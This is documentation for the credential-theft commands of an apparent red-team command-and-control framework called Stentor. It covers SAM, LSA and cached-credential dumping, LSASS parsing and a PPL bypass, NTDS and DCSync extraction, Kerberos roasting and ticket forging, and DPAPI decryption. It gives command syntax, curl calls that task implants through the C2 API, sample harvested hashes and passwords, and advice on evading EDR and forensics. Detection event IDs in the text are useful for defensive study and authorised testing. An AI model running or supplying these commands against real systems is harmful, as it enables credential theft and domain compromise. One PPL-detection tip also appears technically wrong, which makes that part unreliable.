Credential Access¶
Credential harvesting capabilities for extracting authentication material from compromised hosts. Stentor implements a complete credential access toolkit covering local credential stores, LSASS memory parsing, Kerberos protocol attacks, domain replication, DPAPI-protected secrets, and browser credential extraction.
Credential Hierarchy¶
Credential harvesting follows a natural progression from local stores (lowest privilege requirement) through domain-level attacks (highest privilege requirement). Each layer unlocks new attack paths.
flowchart TD
A[Local Credentials] --> B[LSASS Memory]
A --> C[DPAPI Secrets]
B --> D[Domain Credentials]
D --> E[Kerberos Attacks]
D --> F[Lateral Movement]
A1[SAM Database<br/>hashdump / sam_dump] --> A
A2[LSA Secrets<br/>lsa_secrets] --> A
A3[Cached Creds<br/>cached_creds] --> A
B1[logonpasswords<br/>NTLM + WDigest + Kerberos] --> B
B2[lsass_memdump<br/>Minidump to disk] --> B
C1[DPAPI Triage<br/>RDP / WiFi / Vault / Certs] --> C
C2[chromedump<br/>Browser passwords] --> C
D1[DCSync<br/>DRSUAPI replication] --> D
D2[NTDS Dump<br/>AD database extraction] --> D
E1[Kerberoast<br/>TGS ticket cracking] --> E
E2[AS-REP Roast<br/>Pre-auth bypass] --> E
E3[Golden / Silver Ticket<br/>Kerberos forgery] --> E
style A fill:#6a1b9a,color:#fff
style B fill:#4a148c,color:#fff
style C fill:#311b92,color:#fff
style D fill:#1a237e,color:#fff
style E fill:#0d47a1,color:#fff
style F fill:#01579b,color:#fffPrivilege requirements:
| Source | Minimum Privilege | Notes |
|---|---|---|
| SAM / LSA / Cached | Local Admin (SYSTEM) | Registry hive access requires SeBackupPrivilege |
| LSASS | Local Admin + SeDebugPrivilege | RunAsPPL blocks direct access |
| NTDS.dit | Domain Admin | Volume shadow copy on DC |
| DCSync | Replicating Directory Changes | DA/EA or delegated replication rights |
| Kerberoast | Any domain user | Only needs TGT for TGS requests |
| AS-REP Roast | Network access to DC | No authentication required |
| DPAPI | Current user context | User master key or domain backup key |
| Browser creds | Current user context | DPAPI-protected Local State key |
Credential Commands Reference¶
| Command | Syntax | Source | Requires | Output Format | MITRE ATT&CK |
|---|---|---|---|---|---|
hashdump | hashdump | SAM database | Local Admin | user:RID:LM:NT::: (hashcat 1000) | T1003.002 |
sam_dump | sam_dump | SAM database | Local Admin | user:RID:LM:NT::: | T1003.002 |
logonpasswords | logonpasswords | LSASS memory | SeDebugPrivilege | NTLM hashes, WDigest cleartext, Kerberos tickets | T1003.001 |
lsass_memdump | lsass_memdump | LSASS memory | SeDebugPrivilege | .dmp file for offline analysis | T1003.001 |
lsass_legacy | lsass_legacy | LSASS memory | SeDebugPrivilege | .dmp file (direct MiniDump) | T1003.001 |
lsa_secrets | lsa_secrets | LSA secrets | Local Admin | Service passwords, DPAPI keys | T1003.004 |
cached_creds | cached_creds | Domain cache | Local Admin | DCC2 hashes (hashcat 2100) | T1003.005 |
ntds_dump | ntds_dump | NTDS.dit | Domain Admin | NTLM hashes for all domain accounts | T1003.003 |
kerberoast | kerberoast [/spn:...] [/user:...] [/domain:...] | Kerberos TGS | Any domain user | $krb5tgs$ (hashcat 13100/19700) | T1558.003 |
asrep_roast | asrep_roast [/user:...] [/domain:...] | Kerberos AS-REP | Network access | $krb5asrep$ (hashcat 18200) | T1558.004 |
dcsync | dcsync [/user:...] [/domain:...] [/all] | DRSUAPI | Replication rights | NTLM + Kerberos keys | T1003.006 |
golden_ticket | golden_ticket <domain> <sid> <dc> <key> | Forged TGT | krbtgt hash | .kirbi / .ccache ticket | T1558.001 |
silver_ticket | silver_ticket <domain> <sid> <dc> <service> <target> <hash> | Forged TGS | Service account hash | .kirbi / .ccache ticket | T1558.002 |
overpass | overpass <domain> <dc> <user> <hash> | Kerberos AS-REQ | NTLM hash | Valid TGT | T1550.002 |
dpapi_masterkeys | dpapi_masterkeys [--target SID] | DPAPI Protect dir | Current user | Master key GUIDs | T1555.004 |
dpapi_backupkey | dpapi_backupkey <dc> [--domain ...] | LSA RPC | Domain Admin | Domain backup key | T1555.004 |
dpapi_rdp | dpapi_rdp | Credential Manager | Current user + master key | Cleartext RDP passwords | T1555.004 |
dpapi_wifi | dpapi_wifi | WiFi profiles | Local Admin | Cleartext WiFi PSKs | T1555.004 |
dpapi_vault | dpapi_vault | Credential Manager | Current user + master key | Vault entries | T1555.004 |
dpapi_certkeys | dpapi_certkeys [--target SID] | Certificate store | Current user + master key | Certificate private keys | T1555.004 |
dpapi_triage | dpapi_triage [--domain ...] [--dc ...] | All DPAPI sources | Current user + master key | Combined triage output | T1555.004 |
chromedump | chromedump | Chrome/Edge Login Data | Current user | URLs, usernames, cleartext passwords | T1555.003 |
Local Credential Dumping¶
Local credential stores contain authentication material cached on the local machine. These techniques access registry hives in-memory using the Windows registry API -- no child processes like reg.exe are spawned.
All local credential dump commands execute inside a fork-and-run sacrificial process for OPSEC isolation. Registry access artifacts point to the sacrificial PID, not the beacon process.
hashdump¶
Extract NTLM password hashes from the SAM (Security Account Manager) database via in-memory registry parsing.
How it works: Reads the SYSTEM and SAM registry hives in-memory using the Windows registry API, derives the boot key from HKLM\SYSTEM\CurrentControlSet\Control\Lsa class names, decrypts SAM entries using AES-128-CBC (Windows 10+) or DES/RC4 (legacy), and outputs hashes in secretsdump format.
Task type: creds (method: sam_dump)
Dedicated endpoint: POST /api/v1/c2/beacons/:id/hashdump
Example output:
[Fork-and-Run] Sacrificial PID: 5184
Extracted 4 NTLM hashes from SAM database:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
labuser:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Format: username:RID:LM_HASH:NT_HASH:::
OPSEC
- Executes in a fork-and-run sacrificial process (registry artifacts point to sacrificial PID)
- Reads SAM and SYSTEM registry hives via
RegOpenKeyEx/RegQueryValueEx - No
reg.exeorreg save-- purely in-memory parsing (reg.exe fallback removed for OPSEC) - Requires SeBackupPrivilege or SYSTEM context
- MITRE ATT&CK: T1003.002 (OS Credential Dumping: Security Account Manager)
sam_dump¶
Fork-and-run SAM dump variant. Identical technique to hashdump but explicitly uses fork-and-run isolation. The implant binary is re-executed with STENTOR_CRED_MODE=sam so that registry access artifacts originate from the sacrificial process.
Task type: creds (method: sam_dump)
OPSEC
Same technique as hashdump. Both use in-memory registry parsing with fork-and-run isolation. The sam_dump command name is available for CNA script compatibility.
lsa_secrets¶
Extract LSA secrets from the SECURITY and SYSTEM registry hives. LSA secrets contain service account passwords, DPAPI machine master keys, cached auto-logon passwords (DefaultPassword), and other sensitive data stored by LsaStorePrivateData.
How it works: Reads HKLM\SECURITY and HKLM\SYSTEM hives via the registry API, derives the LSA encryption key, and decrypts all stored secrets. Executes in a fork-and-run sacrificial process.
Task type: creds (method: lsa_secrets)
Example output:
[Fork-and-Run] Sacrificial PID: 4892
=== LSA Secrets ===
$MACHINE.ACC
0000 A3 4F 2C 7B 8E ... (machine account password hash)
DPAPI_SYSTEM
User: 0x01000000b1c347...
Machine: 0x01000000f24a58...
DefaultPassword
labuser / P@ssw0rd123
_SC_SQLService
CORP\svc_sql / SqlServiceP@ss!
OPSEC
- Reads SECURITY and SYSTEM registry hives in-memory (no reg.exe)
- Fork-and-run sacrificial process for artifact isolation
- Requires SYSTEM or SeBackupPrivilege for SECURITY hive access
- MITRE ATT&CK: T1003.004 (OS Credential Dumping: LSA Secrets)
cached_creds¶
Extract Domain Cached Credentials (DCC2) from the SECURITY registry hive. Windows caches the last 10 (by default) domain logon credentials in the NL$ cache entries. These are MS-CacheDCv2 (DCC2) hashes that can be cracked offline.
How it works: Reads NL$ cache entries from HKLM\SECURITY\Cache via the registry API, derives the NL$KM key, and outputs DCC2 hashes in hashcat format. Executes in a fork-and-run sacrificial process.
Task type: creds (method: cached_creds)
Example output:
[Fork-and-Run] Sacrificial PID: 3716
Cached Domain Credentials (DCC2):
$DCC2$10240#jsmith#a4f49c406510bdcab6824ee7c30fd852
$DCC2$10240#admin#b7c1e2d3f4a5b6c7d8e9f0a1b2c3d4e5
Format: $DCC2$iterations#username#hash (hashcat mode 2100)
Cracking DCC2 hashes
DCC2 hashes are computationally expensive to crack (10240 PBKDF2 iterations by default).
OPSEC
- Reads SECURITY hive Cache values via registry API (no reg.exe)
- Fork-and-run sacrificial process for artifact isolation
- Requires SYSTEM or SeBackupPrivilege
- MITRE ATT&CK: T1003.005 (OS Credential Dumping: Cached Domain Credentials)
LSASS Memory Access¶
LSASS (Local Security Authority Subsystem Service) holds authentication material for all logged-on users in memory. This includes NTLM hashes, WDigest cleartext passwords (if enabled), Kerberos tickets, and TSPKG credentials.
logonpasswords¶
Parse LSASS process memory in-place to extract credentials from SSP (Security Support Provider) structures. This is Stentor's equivalent of mimikatz sekurlsa::logonpasswords.
How it works: Opens a handle to the LSASS process using NtOpenProcess, reads memory regions using NtReadVirtualMemory, and parses SSP structures:
- MSV1_0 -- NTLM hashes (NT and LM)
- WDigest -- Cleartext passwords (if
UseLogonCredentialregistry value is set) - Kerberos -- Kerberos tickets and session keys
- TSPKG -- Terminal Services credentials
Executes inside a fork-and-run sacrificial process. The NtOpenProcess and NtReadVirtualMemory calls originate from the sacrificial PID.
Task type: creds (method: logonpasswords)
Dedicated endpoint: POST /api/v1/c2/beacons/:id/logonpasswords
Example output:
[Fork-and-Run] Sacrificial PID: 6248
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : CORP\jsmith
Domain : CORP
Logon Server : DC01
Logon Time : 2/19/2026 8:30:15 AM
msv :
[00000003] Primary
* Username : jsmith
* Domain : CORP
* NTLM : 8846f7eaee8fb117ad06bdd830b7586c
* SHA1 : a]9040f9c13d508...
wdigest :
* Username : jsmith
* Domain : CORP
* Password : P@ssw0rd123
kerberos :
* Username : jsmith
* Domain : CORP.LOCAL
* Password : (null)
OPSEC -- High Detection Risk
- Opens a handle to LSASS (
PROCESS_VM_READ | PROCESS_QUERY_INFORMATION) -- triggers Sysmon Event ID 10 NtReadVirtualMemorycalls on LSASS address space- Fork-and-run isolation means the sacrificial PID is the one accessing LSASS, not the beacon
- RunAsPPL (Credential Guard): If
RunAsPPL=1, LSASS is a Protected Process Light and direct memory access fails withSTATUS_ACCESS_DENIED. Options: disable RunAsPPL via registry + reboot, use a PPL bypass driver, or usedcsyncinstead - MITRE ATT&CK: T1003.001 (OS Credential Dumping: LSASS Memory)
lsass_memdump¶
Create a minidump of the LSASS process for offline credential extraction. Produces a .dmp file that can be analyzed with pypykatz, mimikatz, or other offline tools.
How it works: Opens a handle to LSASS, creates a minidump using a memory-backed approach via MiniDumpWriteDump, and writes the dump file to disk. Executes inside a fork-and-run sacrificial process.
Task type: creds (method: lsass_memdump or lsass_minidump)
Example output:
[Fork-and-Run] Sacrificial PID: 7412
LSASS minidump created: C:\Users\Public\lsass_20260219_083015.dmp (48.2 MB)
Offline analysis
OPSEC
- Creates a file on disk (the .dmp file) -- high forensic footprint
- LSASS process handle access triggers Sysmon Event ID 10
MiniDumpWriteDumpAPI call is monitored by EDR- Prefer
logonpasswords(in-memory parsing, no disk write) when possible - MITRE ATT&CK: T1003.001 (OS Credential Dumping: LSASS Memory)
lsass_legacy¶
Direct MiniDumpWriteDump to disk without the memory-backed approach. This is a fallback method for environments where the primary memory dump technique fails.
Task type: creds (method: lsass_legacy)
When to use
Use lsass_legacy only when logonpasswords and lsass_memdump both fail. This method calls MiniDumpWriteDump directly without the memory-backed approach, which is more likely to be detected but may work in edge cases.
LSASS Method Comparison¶
| Method | Process Access | Disk Write | Parsing | Detection Risk |
|---|---|---|---|---|
logonpasswords | NtReadVirtualMemory | None | In-memory (SSP structures) | Medium |
lsass_memdump | MiniDumpWriteDump (memory-backed) | .dmp file | Offline (pypykatz/mimikatz) | High |
lsass_legacy | MiniDumpWriteDump (direct) | .dmp file | Offline (pypykatz/mimikatz) | Highest |
ppl_bypass | AddSecurityPackageW (SSP injection) | Temp SSP DLL | SSP callback capture | High |
Removed method
The lsass_comsvcs method (rundll32.exe comsvcs.dll MiniDump) has been removed for OPSEC. The rundll32.exe comsvcs.dll command line is trivially detected by all modern EDR products. Use logonpasswords or lsass_memdump instead.
PPL Bypass (RunAsPPL)¶
When LSASS is running as a Protected Process Light (PPL), standard credential dumping techniques fail because OpenProcess is denied even with SeDebugPrivilege. The ppl_bypass command circumvents this protection using SSP injection.
How it works:
- Writes a custom Security Support Provider (SSP) DLL to a temporary location
- Calls
AddSecurityPackageWto load the SSP intolsass.exe(the OS loads the DLL into the protected process) - The SSP's
SpLsaModeInitializecallback executes inside LSASS and captures credential material - Results are written to a shared memory section or temp file and read by the beacon
- The temporary SSP DLL is cleaned up
Shell syntax:
API example:
curl -s -X POST "https://stentor.app/api/v1/c2/beacons/$BEACON_ID/task" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"type":"ppl_bypass","data":{}}'
OPSEC
AddSecurityPackageWtriggers Event ID 4614 (Notification Package loaded) in the Security event log- The temporary SSP DLL written to disk is briefly visible to filesystem monitoring
- Requires
SeDebugPrivilegeor SYSTEM context - High risk -- SSP loading is a well-known technique monitored by advanced EDR products
- Clean up is automatic but the Event 4614 entry persists
- MITRE ATT&CK: T1547.005 (Security Support Provider), T1003.001 (LSASS Memory)
When to use ppl_bypass
Use ppl_bypass when logonpasswords fails with "access denied" errors and you've confirmed LSASS is running as PPL (Get-Process lsass | Select-Object -ExpandProperty Path shows MsMpEng or ProtectionLevel is set). If LSASS is not PPL-protected, prefer logonpasswords (lower detection risk).
NTDS.dit Dump¶
ntds_dump¶
Extract NTLM hashes for all domain user accounts from the Active Directory database (NTDS.dit). This technique creates a volume shadow copy of the Domain Controller's system drive, then extracts the NTDS.dit file and SYSTEM hive for offline parsing.
How it works: Executes vssadmin create shadow /for=C: to create a volume shadow copy, then copies NTDS.dit and the SYSTEM hive from the shadow copy. If vssadmin fails, falls back to ntdsutil IFM (Install From Media) mode. Requires Domain Admin privileges on the Domain Controller.
Task type: creds (method: ntds_dump)
Example output:
[*] Creating volume shadow copy...
[+] Shadow copy created: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3
[*] Extracting NTDS.dit from shadow copy...
[+] NTDS.dit extracted: C:\Windows\Temp\ntds.dit (256 MB)
[+] SYSTEM hive extracted: C:\Windows\Temp\SYSTEM (12 MB)
Extracted 1,247 NTLM hashes from NTDS.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a4f49c406510bdcab6824ee7c30fd852:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b7c1e2d3f4a5b6c7d8e9f0a1b2c3d4e5:::
jsmith:1103:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
...
OPSEC -- Very High Detection Risk
- Creates a volume shadow copy (Event ID 8222 from VSS, Event ID 7036 from SCM for
vssservice start) vssadmin.exeorntdsutil.exeexecution is heavily monitored- Large file copy from shadow copy (NTDS.dit can be hundreds of MB)
- Disk artifacts: extracted files remain on the DC until cleaned up
- Prefer
dcsyncfor targeted hash extraction -- it is stealthier and does not require DC filesystem access - MITRE ATT&CK: T1003.003 (OS Credential Dumping: NTDS)
Kerberos Attacks¶
Kerberos-based credential access techniques exploit the Kerberos authentication protocol to extract crackable hashes or forge authentication tickets.
kerberoast¶
Request TGS (Ticket Granting Service) tickets for service accounts with SPNs (Service Principal Names) and extract the encrypted ticket data for offline cracking. The encrypted portion of the TGS ticket is encrypted with the service account's password hash, making it crackable.
How it works: Enumerates service accounts with SPNs via LDAP (using wldap32.dll with SSPI NEGOTIATE bind or explicit credentials via gokrb5), then requests TGS tickets for each SPN. The encrypted ticket data is extracted and formatted for hashcat or John the Ripper. Supports configurable inter-request jitter to avoid burst detection.
Two credential modes:
- SSPI mode (default, no credentials specified): Uses the current Windows session token via SSPI
InitializeSecurityContextfor both LDAP enumeration and TGS requests. No explicit credentials needed. - Explicit mode (username + password specified): Uses
gokrb5library for Kerberos authentication and TGS ticket requests.
Task type: creds (method: kerberoast)
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
domain | string | Auto-detected | %USERDNSDOMAIN% | AD domain (e.g., CORP.LOCAL) |
dc | string | Auto-detected | DNS SRV lookup | Domain Controller IP/hostname |
spns | string[] | No | LDAP enumeration | Specific SPNs to target |
username | string | No | Current token (SSPI) | Explicit credentials for gokrb5 mode |
password | string | No | Current token (SSPI) | Explicit credentials for gokrb5 mode |
output_fmt | string | No | hashcat | Output format: hashcat or john |
jitter_ms | int | No | 1000 | Inter-request jitter in ms (-1 = disabled) |
# SSPI mode (uses current token)
curl -s -X POST "https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"command": "kerberoast"}'
# Explicit credentials
curl -s -X POST "https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"command": "kerberoast /domain:CORP.LOCAL /dc:dc01.corp.local /user:jsmith /password:P@ssw0rd"}'
Example output:
[*] Jitter: 1000ms (range 500-1500ms) between TGS requests
{
"hashes": [
{
"spn": "MSSQLSvc/sql01.corp.local:1433",
"username": "svc_sql",
"domain": "CORP.LOCAL",
"hash": "$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/sql01.corp.local:1433*$a3b4c5...$d6e7f8...",
"enc_type": 23,
"enc_type_name": "RC4-HMAC"
}
],
"count": 1,
"format": "hashcat"
}
Cracking Kerberoast hashes
OPSEC
- Each TGS request generates Event ID 4769 (Kerberos Service Ticket Operation) on the DC
- Multiple TGS requests in quick succession from a single account is a known Kerberoast indicator
- Use jitter (
jitter_msparameter) to space out requests -- default 1000ms with ± 50% randomization - RC4 (etype 23) ticket requests from accounts that normally use AES may trigger alerts
- LDAP enumeration for SPNs generates Event ID 1644 if LDAP query auditing is enabled
- MITRE ATT&CK: T1558.003 (Steal or Forge Kerberos Tickets: Kerberoasting)
asrep_roast¶
Send AS-REQ (Authentication Service Request) messages without pre-authentication data to the KDC for accounts that have "Do not require Kerberos preauthentication" enabled. The KDC responds with an AS-REP containing encrypted data that can be cracked offline.
How it works: Constructs raw AS-REQ messages (RFC 4120) without the PA-ENC-TIMESTAMP pre-authentication data, sends them to the KDC on port 88 via raw TCP, and parses the AS-REP response to extract the encrypted portion. Accounts without the pre-auth requirement return a valid AS-REP; accounts with pre-auth required return a KDC_ERR_PREAUTH_REQUIRED error.
Task type: creds (method: asrep_roast)
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
domain | string | Yes | -- | AD domain (e.g., CORP.LOCAL) |
dc | string | Yes | -- | Domain Controller IP/hostname |
usernames | string[] | Yes | -- | Target usernames to test |
output_fmt | string | No | hashcat | Output format: hashcat or john |
Example output:
{
"hashes": [
{
"username": "svc_backup",
"domain": "CORP.LOCAL",
"hash": "[email protected]:a1b2c3...$d4e5f6...",
"enc_type": 23,
"enc_type_name": "RC4-HMAC",
"vulnerable": true
}
],
"vulnerable_count": 1,
"tested_count": 2,
"format": "hashcat"
}
OPSEC
- AS-REQ without pre-authentication is legitimate protocol behavior -- difficult to distinguish from normal Kerberos traffic
- Each AS-REQ generates Event ID 4768 (Kerberos Authentication Ticket Request)
- Failed requests (pre-auth required) generate Event ID 4771 (Kerberos Pre-authentication Failed)
- No authentication required -- only network access to the DC on port 88
- MITRE ATT&CK: T1558.004 (Steal or Forge Kerberos Tickets: AS-REP Roasting)
DCSync¶
dcsync¶
Replicate domain credential data from a Domain Controller using the MS-DRSR (Directory Replication Service Remote) protocol. DCSync simulates a Domain Controller requesting replication, causing the target DC to send password data for specified accounts.
How it works: Connects to the DC via RPC endpoint mapper (port 135), binds to the DRSUAPI interface using DsBind / DsBindWithCred, resolves target user DNs with DsCrackNames, then calls IDL_DRSGetNCChanges to replicate the password attributes (unicodePwd, supplementalCredentials, ntPwdHistory). Output includes NTLM hash, Kerberos keys (AES256, AES128, DES), and supplemental credentials.
Task type: creds (method: dcsync)
Dedicated endpoint: POST /api/v1/c2/beacons/:id/dcsync
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
domain | string | Yes | -- | AD domain (e.g., CORP.LOCAL) |
dc | string | Yes | -- | Domain Controller IP/hostname |
username | string | Yes | -- | User with replication rights |
password | string | Yes | -- | Password for authentication |
target_users | string[] | No | ["Administrator", "krbtgt"] | Specific users to replicate |
all | bool | No | false | Dump all domain user accounts |
curl -s -X POST "https://stentor.app/api/v1/c2/beacons/$BEACON_ID/dcsync" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{
"domain": "CORP.LOCAL",
"dc": "dc01.corp.local",
"username": "CORP\\admin",
"password": "AdminP@ss",
"target_users": ["krbtgt", "Administrator"]
}'
Example output:
[DC] 'CORP.LOCAL' will be the domain
[DC] 'dc01.corp.local' will be the DC server
Object RDN : CN=krbtgt
** SAM ACCOUNT NAME : krbtgt
Credentials:
Hash NTLM: b7c1e2d3f4a5b6c7d8e9f0a1b2c3d4e5
lm - 0: aad3b435b51404eeaad3b435b51404ee
ntlm- 0: b7c1e2d3f4a5b6c7d8e9f0a1b2c3d4e5
Object RDN : CN=Administrator
** SAM ACCOUNT NAME : Administrator
Credentials:
Hash NTLM: a4f49c406510bdcab6824ee7c30fd852
lm - 0: aad3b435b51404eeaad3b435b51404ee
ntlm- 0: a4f49c406510bdcab6824ee7c30fd852
OPSEC -- High Visibility
- Generates DRS replication traffic to the DC on the DRSUAPI RPC interface
- Event ID 4662 with GUID
{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}(DS-Replication-Get-Changes) and{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}(DS-Replication-Get-Changes-All) - Microsoft Defender for Identity (MDI) specifically detects DCSync as a "Suspected DCSync attack" alert
- RPC endpoint mapper query (port 135) + DRSUAPI bind are visible in network traffic
- Requires
DS-Replication-Get-Changes+DS-Replication-Get-Changes-Allrights -- typically Domain Admin, Enterprise Admin, or DC computer account - MITRE ATT&CK: T1003.006 (OS Credential Dumping: DCSync)
DCSync vs NTDS Dump
Prefer DCSync over NTDS dump when possible. DCSync operates over the network without touching the DC filesystem, avoids volume shadow copy artifacts, and can target specific accounts. NTDS dump requires Domain Admin access to the DC's filesystem and generates significant disk/event log artifacts.
Kerberos Ticket Forging¶
Forge Kerberos tickets using compromised key material to gain persistent or targeted access without needing the original plaintext password.
golden_ticket¶
Forge a Ticket Granting Ticket (TGT) using the krbtgt account's AES256 key. A golden ticket grants the holder Domain Admin-equivalent access to any service in the domain, with a custom lifetime (default 10 years).
How it works: Constructs a TGT (AS-REP) with an arbitrary PAC (Privilege Attribute Certificate) containing admin group memberships (Domain Admins 512, Schema Admins 518, Enterprise Admins 519, Group Policy Creator Owners 520). The ticket is encrypted using the krbtgt AES256 key and exported in .kirbi (Mimikatz/Rubeus) or .ccache (Linux) format.
Task type: creds (method: golden_ticket)
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
domain | string | Yes | -- | AD domain (e.g., CORP.LOCAL) |
domain_sid | string | Yes | -- | Domain SID (e.g., S-1-5-21-...) |
dc | string | Yes | -- | Domain Controller hostname |
krbtgt_key | string | Yes | -- | krbtgt AES256 key (hex) |
username | string | No | Administrator | User to impersonate |
user_rid | int | No | 500 | User RID |
lifetime_days | int | No | 3650 | Ticket lifetime in days |
output_path | string | No | Auto-generated | Output file path |
output_fmt | string | No | ccache | Format: ccache or kirbi |
extra_sids | string[] | No | -- | Extra SIDs for cross-forest (SID History) |
OPSEC
- Golden tickets survive password changes for all accounts except
krbtgt - Detection: TGT with unusual lifetime, PAC validation failures, encryption type mismatches
- Microsoft MDI detects golden tickets via PAC validation and ticket anomalies
- Rotate the
krbtgtpassword twice to invalidate all golden tickets - MITRE ATT&CK: T1558.001 (Steal or Forge Kerberos Tickets: Golden Ticket)
silver_ticket¶
Forge a Ticket Granting Service (TGS) ticket for a specific service using the service account's password hash. Silver tickets provide access to a single service without contacting the KDC.
How it works: Constructs a TGS with a PAC for the specified service, encrypted with the service account's AES256 or NTLM key. Since TGS tickets are validated by the service itself (not the KDC), the forged ticket is accepted without any DC interaction.
Task type: creds (method: silver_ticket)
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
domain | string | Yes | -- | AD domain |
domain_sid | string | Yes | -- | Domain SID |
dc | string | Yes | -- | DC hostname |
service | string | Yes | -- | Service type (e.g., cifs, http, mssql) |
target | string | Yes | -- | Target hostname (e.g., sql01.corp.local) |
hash | string | Yes | -- | Service account NTLM or AES256 hash |
OPSEC
- No KDC interaction required -- harder to detect via network monitoring
- Service-side PAC validation may detect anomalies if enabled
- Limited scope: only the targeted service is accessible
- MITRE ATT&CK: T1558.002 (Steal or Forge Kerberos Tickets: Silver Ticket)
overpass (Overpass-the-Hash)¶
Obtain a legitimate Kerberos TGT by sending an AS-REQ with a hash-based PA-ENC-TIMESTAMP pre-authentication value. This converts an NTLM hash into a valid Kerberos ticket, enabling Kerberos-authenticated access without knowing the plaintext password.
How it works: Constructs an AS-REQ with PA-ENC-TIMESTAMP encrypted using the provided NTLM hash (via RC4-HMAC etype 23) or AES key, sends it to the KDC, and receives a valid TGT in the AS-REP.
Task type: creds (method: overpass)
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
domain | string | Yes | -- | AD domain |
dc | string | Yes | -- | Domain Controller |
username | string | Yes | -- | Target username |
hash | string | Yes | -- | NTLM hash or AES key |
OPSEC
- Generates a legitimate AS-REQ/AS-REP exchange on the DC (Event ID 4768)
- Using RC4 (etype 23) when the account normally uses AES may be flagged as a downgrade attack
- The resulting TGT is indistinguishable from a normally obtained ticket
- MITRE ATT&CK: T1550.002 (Use Alternate Authentication Material: Pass the Hash)
kerberos_ticket_use¶
Import a .kirbi format Kerberos ticket into the beacon's in-memory ticket cache. The imported ticket will be used for subsequent Kerberos-authenticated operations (including jump and remote-exec commands).
Task type: kerberos (method: ticket_use)
kerberos_ccache_use¶
Import a .ccache format credential cache file into the beacon's Kerberos ticket cache. Ccache files are the standard Linux Kerberos credential format (used by kinit, impacket, etc.).
Task type: kerberos (method: ccache_use)
DPAPI Decryption Chain¶
The Data Protection API (DPAPI) is Windows' built-in mechanism for encrypting user secrets. DPAPI-protected data includes saved RDP credentials, WiFi passwords, Credential Manager vault entries, certificate private keys, and browser secrets. Decrypting DPAPI data requires either the user's password or the domain backup key.
flowchart TD
MK[Master Keys<br/>dpapi_masterkeys] --> |User Password| DB[Decrypt Blob]
BK[Domain Backup Key<br/>dpapi_backupkey] --> |LSAD RPC| DB
DB --> RDP[RDP Credentials<br/>dpapi_rdp]
DB --> WIFI[WiFi Passwords<br/>dpapi_wifi]
DB --> VAULT[Vault Entries<br/>dpapi_vault]
DB --> CERT[Certificate Keys<br/>dpapi_certkeys]
TRIAGE[dpapi_triage<br/>Full Chain] --> MK
TRIAGE --> RDP
TRIAGE --> WIFI
TRIAGE --> VAULT
TRIAGE --> CERT
style MK fill:#6a1b9a,color:#fff
style BK fill:#4a148c,color:#fff
style DB fill:#311b92,color:#fff
style RDP fill:#1a237e,color:#fff
style WIFI fill:#1a237e,color:#fff
style VAULT fill:#1a237e,color:#fff
style CERT fill:#1a237e,color:#fff
style TRIAGE fill:#0d47a1,color:#fffdpapi_masterkeys¶
Extract DPAPI master key files from user Protect directories. Master keys are the root encryption keys used to protect DPAPI blobs. Each user has a set of master keys stored at %APPDATA%\Microsoft\Protect\<SID>\.
Task type: dpapi (method: masterkeys)
Example output:
DPAPI master key enumeration for SID S-1-5-21-...-1001:
Found 3 master key files in C:\Users\jsmith\AppData\Roaming\Microsoft\Protect\S-1-5-21-...:
C:\Users\jsmith\...\{a1b2c3d4-e5f6-7890-abcd-ef1234567890} (468 bytes)
C:\Users\jsmith\...\{b2c3d4e5-f6a7-8901-bcde-f12345678901} (468 bytes)
C:\Users\jsmith\...\Preferred (24 bytes)
Note: Master key blobs are encrypted. Decryption requires the user's password
or the domain backup key (via dpapi_backupkey).
OPSEC
- Reads files from the user's profile directory -- minimal footprint
- Does not attempt decryption (enumeration only)
- MITRE ATT&CK: T1555.004 (Credentials from Password Stores: Windows Credential Manager)
dpapi_backupkey¶
Retrieve the domain DPAPI backup key from a Domain Controller via LsaRetrievePrivateData RPC. The domain backup key can decrypt any domain user's DPAPI master keys, enabling offline decryption of all DPAPI-protected secrets across the domain.
Task type: dpapi (method: backupkey)
| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
dc | string | Yes | -- | Domain Controller hostname |
domain | string | No | Auto-detected | AD domain |
OPSEC
- Requires Domain Admin or equivalent privileges
- Makes an LSAD RPC call to the DC (
LsaRetrievePrivateData) - The domain backup key is the "master key" for all domain DPAPI secrets -- extremely high-value credential
- MITRE ATT&CK: T1555.004 (Credentials from Password Stores: Windows Credential Manager)
dpapi_rdp¶
Decrypt saved RDP (Remote Desktop Protocol) credentials from the Windows Credential Manager. These are passwords saved when a user checks "Remember my credentials" in the RDP client.
Task type: dpapi (method: rdp)
OPSEC
- Reads credential files from
%LOCALAPPDATA%\Microsoft\Credentials\ - Requires the user's DPAPI master key (or domain backup key) for decryption
- MITRE ATT&CK: T1555.004
dpapi_wifi¶
Decrypt WiFi profile passwords stored on the local machine. WiFi passwords are DPAPI-protected and stored in XML profiles under ProgramData\Microsoft\Wlansvc\Profiles\.
Task type: dpapi (method: wifi)
OPSEC
- WiFi profiles are machine-level DPAPI blobs (require SYSTEM master key or machine backup key)
